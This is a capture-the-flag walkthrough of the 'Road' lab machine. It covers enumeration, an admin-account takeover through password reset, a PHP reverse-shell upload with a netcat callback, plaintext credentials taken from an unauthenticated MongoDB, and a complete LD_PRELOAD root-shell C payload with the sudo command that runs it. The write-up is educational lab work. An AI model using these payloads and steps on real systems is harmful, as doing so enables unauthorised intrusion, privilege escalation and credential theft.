Road
As usual, we first begin with a simple nmap scan to determine what ports are open and what services are running.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
➜ nmap -sC -sV -p- -T4 10.10.49.198
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-08 13:33 EST
Nmap scan report for 10.10.49.198
Host is up (0.16s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e6:dc:88:69:de:a1:73:8e:84:5b:a1:3e:27:9f:07:24 (RSA)
| 256 6b:ea:18:5d:8d:c7:9e:9a:01:2c:dd:50:c5:f8:c8:05 (ECDSA)
|_ 256 ef:06:d7:e4:b1:65:15:6e:94:62:cc:dd:f0:8a:1a:24 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Sky Couriers
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 427.00 seconds
Awesome, we have two ports open, ssh running on port 22 and Apache running on port 80. Lets visit the website to learn what it’s all about.
Nothing much helpful on this website, so we can proceed to fuzz for hidden directories and files.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
➜ ./ffuf -u http://10.10.49.198/FUZZ -w /usr/share/wordlists/dirb/big.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.49.198/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
.htaccess [Status: 403, Size: 277, Words: 20, Lines: 10]
.htpasswd [Status: 403, Size: 277, Words: 20, Lines: 10]
assets [Status: 301, Size: 313, Words: 20, Lines: 10]
phpMyAdmin [Status: 301, Size: 317, Words: 20, Lines: 10]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10]
v2 [Status: 301, Size: 309, Words: 20, Lines: 10]
:: Progress: [20469/20469] :: Job [1/1] :: 238 req/sec :: Duration: [0:01:44] :: Errors: 0 ::
Awesome, so we now have assets , phpMyAdmin , v2. Lets explore them further.
Visiting /v2 redirects me to /v2/admin/login.html. Lets proceed and register a User.
After loging in as the new user, we get a dashboard.
Poking around the dashboard, we get admin’s email which can be potentially useful in /v2/profile.php as shown in the screenshot below.
While still poking around, i noted that we have the ability to reset a user’s password. I fired up burp and intercepted the request and forward it to repeater
Awesome, we got a 200 so now lets try change the admin’s password since we know their email
It works! So lets try sign in as admin
Next:
- Head over to
/v2/profile.php, you’ll discover the upload feature works. This means we can try upload a php reverse shell.
- Modify the reverse shell by setting your
tun0address and a port of your liking.
1
2
3
4
5
6
7
8
➜ road cp /usr/share/webshells/php/php-reverse-shell.php .
➜ road nano php-reverse-shell.php
➜ road mv php-reverse-shell.php shell.php
➜ road ls -la
total 16
drwxr-xr-x 2 root root 4096 Dec 8 14:59 .
drwxr-xr-x 120 kali kali 4096 Dec 8 13:32 ..
-rwxr-xr-x 1 root root 5494 Dec 8 14:59 shell.php
- Start a nc listener
1
2
➜ road nc -lnvp 9999
listening on [any] 9999 ...
- Curl the shell (Looking at the page source, we get an idea of where the uploaded files are located)
1
➜ curl http://10.10.49.198//v2/profileimages/shell.php
And now we have a shell. Lets start enumerating around.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
➜ nc -lnvp 9999
listening on [any] 9999 ...
connect to [10.8.162.140] from (UNKNOWN) [10.10.49.198] 57992
Linux sky 5.4.0-73-generic #82-Ubuntu SMP Wed Apr 14 17:39:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
20:11:13 up 1:40, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python3
/usr/bin/python3
$ /usr/bin/python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@sky:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@sky:/$ ls -la
total 2047056
drwxr-xr-x 20 root root 4096 May 25 2021 .
drwxr-xr-x 20 root root 4096 May 25 2021 ..
lrwxrwxrwx 1 root root 7 Feb 1 2021 bin -> usr/bin
drwxr-xr-x 3 root root 4096 May 25 2021 boot
drwxr-xr-x 2 root root 4096 May 25 2021 cdrom
drwxr-xr-x 17 root root 3840 Dec 8 18:30 dev
drwxr-xr-x 100 root root 4096 Oct 17 12:20 etc
drwxr-xr-x 3 root root 4096 May 25 2021 home
lrwxrwxrwx 1 root root 7 Feb 1 2021 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Feb 1 2021 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Feb 1 2021 lib64 -> usr/lib64
lrwxrwxrwx 1 root root 10 Feb 1 2021 libx32 -> usr/libx32
drwx------ 2 root root 16384 May 25 2021 lost+found
drwxr-xr-x 2 root root 4096 Feb 1 2021 media
drwxr-xr-x 2 root root 4096 Feb 1 2021 mnt
drwxr-xr-x 2 root root 4096 Feb 1 2021 opt
dr-xr-xr-x 171 root root 0 Dec 8 18:30 proc
drwx------ 6 root root 4096 Oct 8 08:22 root
drwxr-xr-x 26 root root 800 Dec 8 19:12 run
lrwxrwxrwx 1 root root 8 Feb 1 2021 sbin -> usr/sbin
drwxr-xr-x 5 root root 4096 Oct 7 14:06 snap
drwxr-xr-x 2 root root 4096 Feb 1 2021 srv
-rw------- 1 root root 2096103424 May 25 2021 swap.img
dr-xr-xr-x 13 root root 0 Dec 8 18:30 sys
drwxrwxrwt 2 root root 4096 Dec 8 20:08 tmp
drwxr-xr-x 14 root root 4096 Feb 1 2021 usr
drwxr-xr-x 14 root root 4096 May 25 2021 var
www-data@sky:/$ cat /etc/passwd | grep home
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
webdeveloper:x:1000:1000:webdeveloper:/home/webdeveloper:/bin/bash
mongodb:x:114:65534::/home/mongodb:/usr/sbin/nologin
www-data@sky:/$ cd /home/webdeveloper
www-data@sky:/home/webdeveloper$ ls -la
total 36
drwxr-xr-x 4 webdeveloper webdeveloper 4096 Oct 8 10:59 .
drwxr-xr-x 3 root root 4096 May 25 2021 ..
lrwxrwxrwx 1 webdeveloper webdeveloper 9 May 25 2021 .bash_history -> /dev/null
-rw-r--r-- 1 webdeveloper webdeveloper 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 webdeveloper webdeveloper 3771 Feb 25 2020 .bashrc
drwx------ 2 webdeveloper webdeveloper 4096 May 25 2021 .cache
drwxrwxr-x 3 webdeveloper webdeveloper 4096 May 25 2021 .local
-rw------- 1 webdeveloper webdeveloper 51 Oct 8 10:59 .mysql_history
-rw-r--r-- 1 webdeveloper webdeveloper 807 Feb 25 2020 .profile
-rw-r--r-- 1 webdeveloper webdeveloper 0 Oct 7 17:53 .sudo_as_admin_successful
-rw-r--r-- 1 webdeveloper webdeveloper 33 May 25 2021 user.txt
www-data@sky:/home/webdeveloper$ wc user.txt
wc user.txt
1 1 33 user.txt
Looking at users with a home directory, i found webdeveloper and mongodb. The User flag can easily be found in webdeveloper's home directory. Looking at the network connections, i noted a service running on port 27017
1
2
3
4
5
6
7
8
9
10
11
12
13
www-data@sky:/home/webdeveloper$ ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 10.10.49.198%eth0:68 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
tcp LISTEN 0 511 127.0.0.1:9000 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:27017 0.0.0.0:*
tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 511 *:80 *:*
tcp LISTEN 0 128 [::]:22 [::]:*
www-data@sky:/home/webdeveloper$
Doing a quick search on google, i discovered its the default TCP port used by MongoDB.
Being the first time interacting with Mongo, i found some commands one can run at hacktricks
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
www-data@sky:/home/webdeveloper$ mongo
mongo
MongoDB shell version v4.4.6
connecting to: mongodb://127.0.0.1:27017/?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("a0f09137-55f0-4ab5-ba07-f119ffd1c341") }
MongoDB server version: 4.4.6
Welcome to the MongoDB shell.
For interactive help, type "help".
For more comprehensive documentation, see
https://docs.mongodb.com/
Questions? Try the MongoDB Developer Community Forums
https://community.mongodb.com
---
The server generated these startup warnings when booting:
2021-12-08T18:30:45.227+00:00: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine. See http://dochub.mongodb.org/core/prodnotes-filesystem
2021-12-08T18:30:49.152+00:00: Access control is not enabled for the database. Read and write access to data and configuration is unrestricted
---
---
Enable MongoDB's free cloud-based monitoring service, which will then receive and display
metrics about your deployment (disk utilization, CPU, operation statistics, etc).
The monitoring data will be available on a MongoDB website with a unique URL accessible to you
and anyone you share the URL with. MongoDB may use this information to make product
improvements and to suggest MongoDB products and deployment options to you.
To enable free monitoring, run the following command: db.enableFreeMonitoring()
To permanently disable this reminder, run the following command: db.disableFreeMonitoring()
---
> show dbs
admin 0.000GB
backup 0.000GB
config 0.000GB
local 0.000GB
> use backup
switched to db backup
> show collections
collection
user
> db.user.find()
{ "_id" : ObjectId("60ae2661203d21857b184a76"), "Month" : "Feb", "Profit" : "25000" }
{ "_id" : ObjectId("60ae2677203d21857b184a77"), "Month" : "March", "Profit" : "5000" }
{ "_id" : ObjectId("60ae2690203d21857b184a78"), "Name" : "webdeveloper", "Pass" : "BahamasChapp123!@#" }
{ "_id" : ObjectId("60ae26bf203d21857b184a79"), "Name" : "Rohit", "EndDate" : "December" }
{ "_id" : ObjectId("60ae26d2203d21857b184a7a"), "Name" : "Rohit", "Salary" : "30000" }
> db.collection.find()
> exit
bye
Error saving history file: FileOpenFailed Unable to open() file /var/www/.dbshell: Permission denied
Digging the database, i found creds for user webdeveloper:BahamasChapp123!@#. So lets login as them and see what we find.
1
2
3
4
5
6
7
8
9
10
11
12
www-data@sky:/home/webdeveloper$ su webdeveloper
Password: BahamasChapp123!@#
webdeveloper@sky:~$ id
uid=1000(webdeveloper) gid=1000(webdeveloper) groups=1000(webdeveloper),24(cdrom),27(sudo),30(dip),46(plugdev)
webdeveloper@sky:~$ sudo -l
Matching Defaults entries for webdeveloper on sky:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
env_keep+=LD_PRELOAD
User webdeveloper may run the following commands on sky:
(ALL : ALL) NOPASSWD: /usr/bin/sky_backup_utility
Ok, so this user can run /usr/bin/sky_backup_utility without any password. You can also see LD_PRELOAD environment variable has been set. (I once did a ctf where this variable was set and i compiled the following c code from PayloadsAllTheThings and run it as follows:)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
webdeveloper@sky:~$ vi root.c
webdeveloper@sky:~$ cat root.c
cat root.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}
webdeveloper@sky:~$ gcc -fPIC -shared -o shell.so root.c -nostartfiles
webdeveloper@sky:~$ ls -la
ls -la
total 60
drwxr-xr-x 4 webdeveloper webdeveloper 4096 Dec 9 08:32 .
drwxr-xr-x 3 root root 4096 May 25 2021 ..
lrwxrwxrwx 1 webdeveloper webdeveloper 9 May 25 2021 .bash_history -> /dev/null
-rw-r--r-- 1 webdeveloper webdeveloper 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 webdeveloper webdeveloper 3771 Feb 25 2020 .bashrc
drwx------ 2 webdeveloper webdeveloper 4096 May 25 2021 .cache
drwxrwxr-x 3 webdeveloper webdeveloper 4096 May 25 2021 .local
-rw------- 1 webdeveloper webdeveloper 51 Oct 8 10:59 .mysql_history
-rw-r--r-- 1 webdeveloper webdeveloper 807 Feb 25 2020 .profile
-rw-rw-r-- 1 webdeveloper webdeveloper 168 Dec 9 08:31 root.c
-rwxrwxr-x 1 webdeveloper webdeveloper 14760 Dec 9 08:32 shell.so
-rw-r--r-- 1 webdeveloper webdeveloper 0 Oct 7 17:53 .sudo_as_admin_successful
-rw-r--r-- 1 webdeveloper webdeveloper 33 May 25 2021 user.txt
-rw------- 1 webdeveloper webdeveloper 932 Dec 9 08:31 .viminfo
webdeveloper@sky:~$ sudo LD_PRELOAD=/home/webdeveloper/shell.so /usr/bin/sky_backup_utility
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# wc root.txt
1 1 33 root.txt
After executing the command above with LD_PRELOAD, we spawn a root shell. Thanks for reading my write-up.😃 I would really appreciate it if i got your feedback on the same, like was it informative, too long, my grammar and use of terminologies was wrong?
Feel free to reach out to me on Twitter @oste_ke